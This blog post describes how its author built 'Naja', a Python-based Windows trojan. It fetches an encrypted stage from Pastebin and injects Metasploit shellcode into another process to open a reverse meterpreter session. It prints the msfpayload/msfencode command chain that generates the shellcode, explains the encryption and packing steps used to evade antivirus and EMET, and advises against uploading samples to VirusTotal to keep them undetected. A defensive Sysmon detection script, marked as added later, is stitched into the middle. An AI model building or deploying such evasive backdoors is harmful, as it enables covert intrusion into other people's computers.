Naja: a genus of venomous elapid snakes known as cobras. Pseudonaja textilis, more commonly known as the Eastern brown snake, is considered the world’s second most venomous land snake based on its LD50 value in mice.

Naja – in this instance – is a Windows trojan developed by me in Python, inspired by several other Python projects (mentioned throughout this post), which makes use of Metasploit shellcode to facilitate a reverse connection to targets. It is distributed in two parts and makes heavy use of various encoding mechanisms and encryption in conjunction with process injection to bypass antivirus and other mitigations like Microsoft’s EMET.

Note: This post was originally made on 16 Dec ’14, but has since been updated.


operation

Inspiration for Naja came from the Veil Framework: a framework used to generate undetectable executable backdoors. Naja provides nowhere near as much flexibility or automation, but it still fulfils my tasks quite nicely and has been an excellent learning experience.

  • An SFX executable unpacks a small Python script together with a full Python interpreter, allowing the script to run on machines that do not have Python installed.
  • The Python script calls out to a web server and retrieves an encrypted string (stored as a text file).
  • The string is decrypted and executed: a process is spawned with SeDebugPrivilege, a block of memory is allocated in that process, attacker-defined shellcode is written into it and then invoked.
  • A meterpreter session is provided to the attacker.
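As an added illustration from the detection side (not code from the original post or the Naja project), the following correlates the four stages above over constructed Sysmon-style events: a python.exe running out of a temp/SFX directory, a fetch from a paste service, then a thread created in another process. The Sysmon event IDs (1, 3, 8) are real; the field names, host list and sample records are constructed, and the assumption that the injection step is visible as Sysmon Event 8 (CreateRemoteThread) is mine.

```python
from collections import defaultdict

# Constructed list of paste services; extend to match your own telemetry.
PASTE_HOSTS = {"pastebin.com", "paste.ee", "hastebin.com"}
# Typical locations an SFX archive unpacks into (lower-cased for matching).
TEMP_HINTS = ("\\temp\\", "\\appdata\\local\\temp\\")

def naja_like_chains(events):
    """Return PIDs of python.exe processes that (a) run from a temp/SFX
    directory, (b) connect to a paste service and (c) afterwards create a
    remote thread in another process. `events` is time-ordered; event ids
    follow Sysmon (1 = process create, 3 = network, 8 = CreateRemoteThread)."""
    state = defaultdict(dict)  # pid -> stages observed so far
    for ev in events:
        pid = ev["pid"]
        if ev["id"] == 1:
            img = ev["image"].lower()
            if img.endswith("python.exe") and any(h in img for h in TEMP_HINTS):
                state[pid]["temp_python"] = True
        elif ev["id"] == 3 and state[pid].get("temp_python"):
            if ev.get("dest_host", "").lower() in PASTE_HOSTS:
                state[pid]["paste_fetch"] = True
        elif ev["id"] == 8 and state[pid].get("paste_fetch"):
            if ev["target_pid"] != pid:  # thread injected into a foreign process
                state[pid]["inject"] = True
    return sorted(p for p, s in state.items() if s.get("inject"))

# Constructed sample telemetry (not real logs): PID 4120 is the full chain,
# PID 5000 is an ordinary Python install talking to pastebin and is ignored.
SAMPLE_EVENTS = [
    {"id": 1, "pid": 4120, "image": r"C:\Users\bob\AppData\Local\Temp\RarSFX0\python.exe"},
    {"id": 3, "pid": 4120, "dest_host": "pastebin.com", "dest_port": 443},
    {"id": 1, "pid": 4188, "image": r"C:\Windows\System32\notepad.exe"},
    {"id": 8, "pid": 4120, "target_pid": 4188},
    {"id": 1, "pid": 5000, "image": r"C:\Python27\python.exe"},
    {"id": 3, "pid": 5000, "dest_host": "pastebin.com", "dest_port": 443},
]

if __name__ == "__main__":
    print(naja_like_chains(SAMPLE_EVENTS))  # -> [4120]
```

Any single stage on its own is noisy (developers run Python from temp directories, and paste services are widely used); the signal here is the ordered combination.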


requisites

  • python 2.7 x86
  • pycrypto for python 2.7
  • py2exe for python 2.7
  • pywin32 for python 2.7


folder structure

As below:

notes:

  • All directories must exist in order for the script to successfully run.


scripts

The underlying injection script (raw.py) is a stripped-down version of pyinject, modified for this purpose.


demonstration

Shellcode is first generated and formatted on the attacking machine using a rather ugly chain of commands:

msfpayload LHOST= LPORT= EXITFUNC=thread R|msfencode -e x86/shikata_ga_nai -c 10 -t py|sed -e 's/buf =  \"\"//g'|sed -e 's/buf += \"//g'|sed 's/\"//g'|awk 'BEGIN {FS="\n"; RS="-\n"}{if(NF>2){for(i=1;i<=NF;i++)printf("%s ",$i);}}'|sed -r 's/\s+//g'

In case you don’t understand this, the command:
  1. Generates the raw shellcode.
  2. Encodes the shellcode.
  3. Strips unnecessary characters out of the shellcode.
  4. Pulls all of the text onto a single line.
  5. Removes any white space.

This is done so that the shellcode can be passed to the build script on the command line as a single string:

… as done here:

A series of string manipulations then take place:
  1. The injection script has the shellcode substituted into it.
  2. An encryption key and some random variables are generated.
  3. The import section of the wrapper script is formed, and the random AES and base64 variable names substituted into it.
  4. The injection script is encrypted.
  5. The encrypted script is then wrapped with the decryption function, the whole lot converted to base64 and output to a text file.

Following this, the rest of the wrapper script is formed that can be packed by py2exe to produce the final executable:

The encrypted text file is uploaded to a web server or paste service like Pastebin (and retrieved in raw format), where it can be fetched by the backdoor at runtime:


Of course, this all works as intended:

… even with fully updated Trend Micro OfficeScan (with all features enabled) and EMET 5.1 with the maximum security profile configured:

In fact, it is only detected by G Data:

For a fair while Clam AV simply didn’t like the packer – even when tested with a simple Hello World script. So I’m assuming that with enough pressure they realised that py2exe and pyinstaller are incredibly common, and not used only for nefarious purposes. The same may turn out to be true of G Data.


final note

I urge you, if you decide to use this code yourself:

  • Do not upload anything produced to Hybrid Analysis, malwr or Virus Total. Please use No Distribute.
  • Do not use this maliciously. Base your own projects off of it, or use it for lab testing.

You can find the source code for this project on GitHub.
